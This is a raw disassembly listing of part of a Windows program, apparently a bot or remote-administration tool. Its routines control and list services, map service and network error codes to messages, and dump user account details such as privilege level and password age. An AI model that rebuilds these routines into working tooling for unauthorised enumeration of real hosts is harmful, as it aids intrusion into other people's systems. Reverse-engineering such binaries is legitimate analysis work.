var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_412DD0
mov eax, [ebp+arg_0]
lea edx, [eax+1]
loc_405AE8: ; CODE XREF: sub_405AD5+18�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_405AE8
sub eax, edx
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
loc_405AFA: ; CODE XREF: sub_405AD5+2A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_405AFA
push ebx
push esi
sub eax, ecx
mov esi, eax
push edi
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_405A98
add esp, 0Ch
dec esi
mov edi, esi
jmp short loc_405B97
; ---------------------------------------------------------------------------
loc_405B23: ; CODE XREF: sub_405AD5+C4�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax
call sub_413A6E
mov ebx, eax
mov eax, [ebp+arg_0]
movsx eax, byte ptr [edi+eax]
push eax
call sub_413A6E
cmp eax, ebx
pop ecx
pop ecx
jz short loc_405B95
loc_405B45: ; CODE XREF: sub_405AD5+BE�j
mov ebx, [ebp+arg_0]
xor eax, eax
mov al, [edi+ebx]
push eax
call sub_4056EA
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_405B68
mov eax, ecx
loc_405B68: ; CODE XREF: sub_405AD5+8F�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_405BA5
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax
call sub_413A6E
movsx ecx, byte ptr [edi+ebx]
push ecx
mov [ebp+var_8], eax
call sub_413A6E
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_405B45
loc_405B95: ; CODE XREF: sub_405AD5+6E�j
dec edi
dec esi
loc_405B97: ; CODE XREF: sub_405AD5+4C�j
test esi, esi
jg short loc_405B23
mov eax, [ebp+arg_0]
add eax, edi
loc_405BA0: ; CODE XREF: sub_405AD5+D2�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_405BA5: ; CODE XREF: sub_405AD5+98�j
xor eax, eax
jmp short loc_405BA0
sub_405AD5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405BA9 proc near ; CODE XREF: sub_40668A+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
push 0F003Fh
xor ebx, ebx
push ebx
push ebx
call dword_43355C
mov edi, eax
cmp edi, ebx
jnz short loc_405BD0
call ds:dword_41F008 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_405C45
; ---------------------------------------------------------------------------
loc_405BD0: ; CODE XREF: sub_405BA9+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call dword_4335D8
mov esi, eax
cmp esi, ebx
jnz short loc_405BF0
call ds:dword_41F008 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_405C3D
; ---------------------------------------------------------------------------
loc_405BF0: ; CODE XREF: sub_405BA9+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_405C23
cmp eax, 3
jz short loc_405C14
jle short loc_405C36
cmp eax, 6
jg short loc_405C36
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call dword_433580
jmp short loc_405C2A
; ---------------------------------------------------------------------------
loc_405C14: ; CODE XREF: sub_405BA9+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call dword_433564
jmp short loc_405C2A
; ---------------------------------------------------------------------------
loc_405C23: ; CODE XREF: sub_405BA9+4D�j
push esi
call dword_433494
loc_405C2A: ; CODE XREF: sub_405BA9+69�j
; sub_405BA9+78�j
test eax, eax
jnz short loc_405C36
call ds:dword_41F008 ; RtlGetLastWin32Error
mov ebx, eax
loc_405C36: ; CODE XREF: sub_405BA9+54�j
; sub_405BA9+59�j ...
push esi
call dword_4334D0
loc_405C3D: ; CODE XREF: sub_405BA9+45�j
push edi
call dword_4334D0
pop esi
loc_405C45: ; CODE XREF: sub_405BA9+25�j
pop edi
mov eax, ebx
pop ebx
leave
retn
sub_405BA9 endp
; =============== S U B R O U T I N E =======================================
sub_405C4B proc near ; CODE XREF: sub_40668A:loc_4066D2�p
mov ecx, 420h
cmp eax, ecx
ja loc_405CFC
jz loc_405CF5
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_405CBF
jz short loc_405CB5
mov ecx, eax
sub ecx, 3
jz short loc_405CAB
dec ecx
dec ecx
jz short loc_405CA1
dec ecx
jz short loc_405C97
sub ecx, 51h
jz short loc_405C8D
sub ecx, 24h
jnz loc_405D72 ; default
; jumptable 00405D19 cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405C8D: ; CODE XREF: sub_405C4B+2D�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405C97: ; CODE XREF: sub_405C4B+28�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405CA1: ; CODE XREF: sub_405C4B+25�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405CAB: ; CODE XREF: sub_405C4B+21�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405CB5: ; CODE XREF: sub_405C4B+1A�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405CBF: ; CODE XREF: sub_405C4B+18�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_405CEE
dec ecx
jz short loc_405CE7
dec ecx
jz short loc_405CE0
dec ecx
jnz loc_405D72 ; default
; jumptable 00405D19 cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_405D64
; ---------------------------------------------------------------------------
loc_405CE0: ; CODE XREF: sub_405C4B+82�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405CE7: ; CODE XREF: sub_405C4B+7F�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405CEE: ; CODE XREF: sub_405C4B+7C�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405CF5: ; CODE XREF: sub_405C4B+D�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405CFC: ; CODE XREF: sub_405C4B+7�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_405D72 ; default
; jumptable 00405D19 cases 1,5,6,8,9,12,13,15,16
jz short loc_405D5F
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_405D72 ; default
; jumptable 00405D19 cases 1,5,6,8,9,12,13,15,16
movzx ecx, ds:byte_405DB3[ecx]
jmp ds:off_405D8B[ecx*4] ; switch jump
loc_405D20: ; DATA XREF: .text:off_405D8B�o
push offset aTheSpecifiedDa ; jumptable 00405D19 case 7
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D27: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheServiceDepe ; jumptable 00405D19 case 17
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D2E: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheServiceDe_0 ; jumptable 00405D19 case 10
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D35: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheServiceHasB ; jumptable 00405D19 case 0
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D3C: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheSpecified_0 ; jumptable 00405D19 case 2
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D43: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheServiceCoul ; jumptable 00405D19 case 11
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D4A: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheServiceHa_0 ; jumptable 00405D19 case 14
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D51: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheRequested_1 ; jumptable 00405D19 case 3
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D58: ; CODE XREF: sub_405C4B+CE�j
; DATA XREF: .text:off_405D8B�o
push offset aTheServiceHasN ; jumptable 00405D19 case 4
jmp short loc_405D64
; ---------------------------------------------------------------------------
loc_405D5F: ; CODE XREF: sub_405C4B+BA�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_405D64: ; CODE XREF: sub_405C4B+3D�j
; sub_405C4B+47�j ...
push offset dword_433860
call sub_412BB5
pop ecx
pop ecx
jmp short loc_405D85
; ---------------------------------------------------------------------------
loc_405D72: ; CODE XREF: sub_405C4B+32�j
; sub_405C4B+85�j ...
push eax ; default
; jumptable 00405D19 cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownErr_0 ; "An unknown error occurred: <%ld>"
push offset dword_433860
call sub_412BB5
add esp, 0Ch
loc_405D85: ; CODE XREF: sub_405C4B+125�j
mov eax, offset dword_433860
retn
sub_405C4B endp
; ---------------------------------------------------------------------------
off_405D8B dd offset loc_405D35 ; DATA XREF: sub_405C4B+CE�r
dd offset loc_405D3C ; jump table for switch statement
dd offset loc_405D51
dd offset loc_405D58
dd offset loc_405D20
dd offset loc_405D2E
dd offset loc_405D43
dd offset loc_405D4A
dd offset loc_405D27
dd offset loc_405D72
byte_405DB3 db 0, 9, 1, 2 ; DATA XREF: sub_405C4B+C7�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405DC5 proc near ; CODE XREF: sub_4078FA+1C1D�p
var_38C = byte ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call dword_43355C
push ebx
push [ebp+arg_8]
mov [ebp+var_C], eax
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 14h
loc_405DFD: ; CODE XREF: sub_405DC5+123�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push 168h
lea eax, [ebp+var_18C]
push eax
push 3
push 30h
push [ebp+var_C]
call dword_43356C
test eax, eax
jnz short loc_405E37
call ds:dword_41F008 ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_405EEE
loc_405E37: ; CODE XREF: sub_405DC5+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_405EE5
lea esi, [ebp+var_188]
loc_405E48: ; CODE XREF: sub_405DC5+11A�j
mov eax, [esi+8]
dec eax
jz short loc_405E94
dec eax
jz short loc_405E8D
dec eax
jz short loc_405E86
dec eax
jz short loc_405E7F
dec eax
jz short loc_405E78
dec eax
jz short loc_405E71
dec eax
lea eax, [ebp+var_20]
jz short loc_405E6A
push offset aUnknown_0 ; " Unknown"
jmp short loc_405E9C
; ---------------------------------------------------------------------------
loc_405E6A: ; CODE XREF: sub_405DC5+9C�j
push offset aPaused_0 ; " Paused"
jmp short loc_405E9C
; ---------------------------------------------------------------------------
loc_405E71: ; CODE XREF: sub_405DC5+96�j
push offset aPausing ; " Pausing"
jmp short loc_405E99
; ---------------------------------------------------------------------------
loc_405E78: ; CODE XREF: sub_405DC5+93�j
push offset aContinuing ; " Continuing"
jmp short loc_405E99
; ---------------------------------------------------------------------------
loc_405E7F: ; CODE XREF: sub_405DC5+90�j
push offset aRunning ; " Running"
jmp short loc_405E99
; ---------------------------------------------------------------------------
loc_405E86: ; CODE XREF: sub_405DC5+8D�j
push offset aStoping ; " Stoping"
jmp short loc_405E99
; ---------------------------------------------------------------------------
loc_405E8D: ; CODE XREF: sub_405DC5+8A�j
push offset aStarting ; " Starting"
jmp short loc_405E99
; ---------------------------------------------------------------------------
loc_405E94: ; CODE XREF: sub_405DC5+87�j
push offset aStopped ; " Stopped"
loc_405E99: ; CODE XREF: sub_405DC5+B1�j
; sub_405DC5+B8�j ...
lea eax, [ebp+var_20]
loc_405E9C: ; CODE XREF: sub_405DC5+A3�j
; sub_405DC5+AA�j
push eax
call sub_412BB5
pop ecx
pop ecx
push dword ptr [esi]
lea eax, [ebp+var_20]
push dword ptr [esi-4]
push eax
lea eax, [ebp+var_38C]
push offset aSSS_0 ; "%s: %s (%s)"
push eax
call sub_412BB5
push 1
push [ebp+arg_8]
lea eax, [ebp+var_38C]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4045DD
add esp, 28h
inc edi
add esi, 24h
cmp edi, [ebp+var_4]
jl loc_405E48
loc_405EE5: ; CODE XREF: sub_405DC5+77�j
cmp [ebp+var_8], ebx
jnz loc_405DFD
loc_405EEE: ; CODE XREF: sub_405DC5+6C�j
push [ebp+var_C]
call dword_4334D0
xor eax, eax
cmp eax, [ebp+var_4]
pop edi
sbb eax, eax
pop esi
neg eax
pop ebx
leave
retn
sub_405DC5 endp
; =============== S U B R O U T I N E =======================================
sub_405F05 proc near ; CODE XREF: sub_405FC7+A�p
; sub_405FC7+14�p ...
arg_0 = dword ptr 4
push ebp
mov ebp, [esp+4+arg_0]
xor eax, eax
cmp ebp, eax
jnz short loc_405F12
pop ebp
retn
; ---------------------------------------------------------------------------
loc_405F12: ; CODE XREF: sub_405F05+9�j
push ebx
push esi
mov esi, ds:dword_41F0A8
push edi
push eax
push eax
push 0FFFFFFFFh
push ebp
push 1
push eax
call esi ; MultiByteToWideChar
mov edi, eax
lea eax, [edi+edi+2]
push eax
call sub_413A90
pop ecx
push edi
mov ebx, eax
push ebx
push 0FFFFFFFFh
push ebp
push 1
push 0
call esi ; MultiByteToWideChar
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn
sub_405F05 endp
; =============== S U B R O U T I N E =======================================
sub_405F46 proc near ; CODE XREF: sub_40E9C5+248�p
arg_10 = dword ptr 14h
arg_14 = dword ptr 18h
arg_20 = dword ptr 24h
mov eax, offset loc_41E8BA
call sub_413EF4
push esi
xor esi, esi
cmp [esp+4+arg_10], esi
jnz short loc_405F5D
xor eax, eax
jmp short loc_405FB9
; ---------------------------------------------------------------------------
loc_405F5D: ; CODE XREF: sub_405F46+11�j
push ebx
push ebp
push edi
mov edi, ds:dword_41F0AC
push esi
push esi
push esi
push esi
push 0FFFFFFFFh
push [esp+24h+arg_10]
mov ebx, 400h
push ebx
push esi
call edi ; WideCharToMultiByte
test byte ptr dword_4338C0, 1
mov ebp, eax
jnz short loc_405F9E
or dword_4338C0, 1
lea eax, [ebp+1]
push eax
mov [esp+4+arg_14], esi
call sub_413A90
pop ecx
mov dword_4338BC, eax
loc_405F9E: ; CODE XREF: sub_405F46+3C�j
push esi
push esi
push ebp
push dword_4338BC
push 0FFFFFFFFh
push [esp+14h+arg_20]
push ebx
push esi
call edi ; WideCharToMultiByte
mov eax, dword_4338BC
pop edi
pop ebp
pop ebx
loc_405FB9: ; CODE XREF: sub_405F46+15�j
mov ecx, [esp+4]
pop esi
mov large fs:0, ecx
leave
retn
sub_405F46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405FC7 proc near ; CODE XREF: sub_406702+6C�p
; sub_40ECEC+18F�p ...
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
push edi
push [ebp+arg_0]
call sub_405F05
push [ebp+arg_4]
mov edi, eax
call sub_405F05
push 24h
push [ebp+arg_4]
mov [ebp+var_24], eax
call sub_413F30
push [ebp+arg_8]
neg eax
sbb eax, eax
and [ebp+var_1C], 0
or [ebp+var_14], 0FFFFFFFFh
and [ebp+var_10], 0
and eax, 80000000h
mov [ebp+var_20], eax
mov [ebp+var_18], 7Fh
call sub_405F05
and [ebp+var_8], 0
add esp, 14h
mov [ebp+var_C], eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push 2
push edi
call dword_433488
pop edi
leave
retn
sub_405FC7 endp
; =============== S U B R O U T I N E =======================================
sub_406032 proc near ; CODE XREF: sub_406702+20�p
; sub_40E9C5+1BD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_405F05
push [esp+8+arg_4]
mov esi, eax
call sub_405F05
pop ecx
pop ecx
push 0
push eax
push esi
call dword_4334A4
pop esi
retn
sub_406032 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406055 proc near ; CODE XREF: sub_4068DF+4C�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 24h
and [ebp+var_4], 0
push edi
push [ebp+arg_0]
call sub_405F05
push [ebp+arg_4]
mov edi, eax
call sub_405F05
push [ebp+arg_8]
mov [ebp+var_24], eax
call sub_405F05
and [ebp+var_14], 0
and [ebp+var_10], 0
and [ebp+var_8], 0
add esp, 0Ch
lea ecx, [ebp+var_4]
push ecx
mov [ebp+var_20], eax
xor eax, eax
lea ecx, [ebp+var_24]
inc eax
push ecx
push eax
push edi
mov [ebp+var_18], eax
mov [ebp+var_C], 10001h
call dword_43346C
pop edi
leave
retn
sub_406055 endp
; =============== S U B R O U T I N E =======================================
sub_4060AF proc near ; CODE XREF: sub_4068DF+39�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_0]
call sub_405F05
push [esp+8+arg_4]
mov esi, eax
call sub_405F05
pop ecx
pop ecx
push eax
push esi
call dword_433568
pop esi
retn
sub_4060AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4060D0 proc near ; CODE XREF: sub_4068DF+2D�p
var_208 = byte ptr -208h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 208h
and [ebp+var_4], 0
push esi
push [ebp+arg_0]
call sub_405F05
push [ebp+arg_4]
mov esi, eax
call sub_405F05
pop ecx
pop ecx
lea ecx, [ebp+var_4]
push ecx
push 0Bh
push eax
push esi
call dword_43348C
test eax, eax
mov [ebp+var_8], eax
jnz loc_40645D
mov eax, [ebp+var_4]
test eax, eax
jz loc_406498
push ebx
push edi
push dword ptr [eax]
lea eax, [ebp+var_208]
push offset aAccountS ; "Account: %S"
push eax
call sub_412BB5
mov esi, [ebp+arg_10]
mov edi, [ebp+arg_C]
mov ebx, [ebp+arg_8]
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
lea eax, [ebp+var_208]
push offset aFullNameS ; "Full Name: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+8]
lea eax, [ebp+var_208]
push offset aUserCommentS ; "User Comment: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+4]
lea eax, [ebp+var_208]
push offset aCommentS ; "Comment: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
mov eax, [eax+10h]
add esp, 40h
sub eax, 0
jz short loc_4061E9
dec eax
jz short loc_4061E2
dec eax
jz short loc_4061DB
mov eax, offset aUnknown ; "Unknown"
jmp short loc_4061EE
; ---------------------------------------------------------------------------
loc_4061DB: ; CODE XREF: sub_4060D0+102�j
mov eax, offset aAdministrator ; "Administrator"
jmp short loc_4061EE
; ---------------------------------------------------------------------------
loc_4061E2: ; CODE XREF: sub_4060D0+FF�j
mov eax, offset aUser_1 ; "User"
jmp short loc_4061EE
; ---------------------------------------------------------------------------
loc_4061E9: ; CODE XREF: sub_4060D0+FC�j
mov eax, offset aGuest ; "Guest"
loc_4061EE: ; CODE XREF: sub_4060D0+109�j
; sub_4060D0+110�j ...
push eax
lea eax, [ebp+var_208]
push offset aPrivilegeLevel ; "Privilege Level: %s"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+14h]
lea eax, [ebp+var_208]
push offset aAuthFlagsD ; "Auth Flags: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+1Ch]
lea eax, [ebp+var_208]
push offset aHomeDirectoryS ; "Home Directory: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+20h]
lea eax, [ebp+var_208]
push offset aParametersS ; "Parameters: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+18h]
lea eax, [ebp+var_208]
push offset aPasswordAgeD ; "Password Age: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+2Ch]
lea eax, [ebp+var_208]
push offset aBadPasswordCou ; "Bad Password Count: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+30h]
lea eax, [ebp+var_208]
push offset aNumberOfLogins ; "Number of Logins: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+24h]
lea eax, [ebp+var_208]
push offset aLastLogonD ; "Last Logon: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+28h]
lea eax, [ebp+var_208]
push offset aLastLogoffD ; "Last Logoff: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+34h]
lea eax, [ebp+var_208]
push offset aLogonServerS ; "Logon Server: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+3Ch]
lea eax, [ebp+var_208]
push offset aWorkstationsS ; "Workstations: %S"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+38h]
lea eax, [ebp+var_208]
push offset aCountryCodeD ; "Country Code: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+4Ch]
lea eax, [ebp+var_208]
push offset aUserSLanguageD ; "User's Language: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
push dword ptr [eax+40h]
lea eax, [ebp+var_208]
push offset aMax_StorageD ; "Max. Storage: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
mov eax, [ebp+var_4]
add esp, 40h
push dword ptr [eax+44h]
lea eax, [ebp+var_208]
push offset aUnitsPerWeekD ; "Units Per Week: %d"
push eax
call sub_412BB5
push 1
push esi
lea eax, [ebp+var_208]
push eax
push edi
push ebx
call sub_4045DD
add esp, 20h
pop edi
pop ebx
jmp short loc_406489
; ---------------------------------------------------------------------------
loc_40645D: ; CODE XREF: sub_4060D0+35�j
push eax
lea eax, [ebp+var_208]
push offset aNetUserInfoErr ; "[NET]: User info error: <%ld>"
push eax
call sub_412BB5
push 0
push [ebp+arg_10]
lea eax, [ebp+var_208]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4045DD
add esp, 20h
loc_406489: ; CODE XREF: sub_4060D0+38B�j
cmp [ebp+var_4], 0
jz short loc_406498
push [ebp+var_4]
call dword_4334D8
loc_406498: ; CODE XREF: sub_4060D0+40�j
; sub_4060D0+3BD�j
mov eax, [ebp+var_8]
pop esi
leave
retn
sub_4060D0 endp
; =============== S U B R O U T I N E =======================================
sub_40649E proc near ; CODE XREF: sub_4065CE+9E�p
; sub_406702:loc_406742�p ...
mov ecx, 858h
cmp eax, ecx
ja loc_40654C
jz loc_406545
cmp eax, 7Bh
ja short loc_406511
jz short loc_406507
cmp eax, 5
jz short loc_4064FD
cmp eax, 8
jz short loc_4064F3
cmp eax, 32h
jz short loc_4064E9
cmp eax, 35h
jz short loc_4064DF
cmp eax, 57h
jnz loc_40659B
push offset aInvalidParamet ; "Invalid parameter."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_4064DF: ; CODE XREF: sub_40649E+2C�j
push offset aServerNameNotF ; "Server name not found."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_4064E9: ; CODE XREF: sub_40649E+27�j
push offset aThisNetworkReq ; "This network request is not supported."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_4064F3: ; CODE XREF: sub_40649E+22�j
push offset aNotEnoughMemor ; "Not enough memory."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_4064FD: ; CODE XREF: sub_40649E+1D�j
push offset aAccessDenied_ ; "Access denied."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_406507: ; CODE XREF: sub_40649E+18�j
push offset aTheNameIsInval ; "The name is invalid."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_406511: ; CODE XREF: sub_40649E+16�j
sub eax, 7Ch
jz short loc_40653E
sub eax, 7C8h
jz short loc_406537
dec eax
jz short loc_40652D
dec eax
jnz short loc_40659B
push offset aDuplicateShare ; "Duplicate share name."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_40652D: ; CODE XREF: sub_40649E+80�j
push offset aInvalidForRedi ; "Invalid for redirected resource."
jmp loc_4065BC
; ---------------------------------------------------------------------------
loc_406537: ; CODE XREF: sub_40649E+7D�j
push offset aDeviceOrDirect ; "Device or directory does not exist."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_40653E: ; CODE XREF: sub_40649E+76�j
push offset aLevelParameter ; "Level parameter is invalid."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_406545: ; CODE XREF: sub_40649E+D�j
push offset aAGeneralFailur ; "A general failure occurred in the netwo"...
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_40654C: ; CODE XREF: sub_40649E+7�j
mov ecx, 8C5h
cmp eax, ecx
ja short loc_406585
jz short loc_40657E
sub eax, 8ADh
jz short loc_4065B0
dec eax
dec eax
jz short loc_406577
dec eax
jz short loc_406570
dec eax
dec eax
jnz short loc_40659B
push offset aTheOperationIs ; "The operation is allowed only on the pr"...
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_406570: ; CODE XREF: sub_40649E+C5�j
push offset aTheUserAccount ; "The user account already exists."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_406577: ; CODE XREF: sub_40649E+C2�j
push offset aTheGroupAlread ; "The group already exists."
jmp short loc_4065BC
; ---------------------------------------------------------------------------
loc_40657E: ; CODE XREF: sub_40649E+B7�j
push offset aThePasswordIsS ; "The password is shorter than required ("...
jmp short loc_4065BC
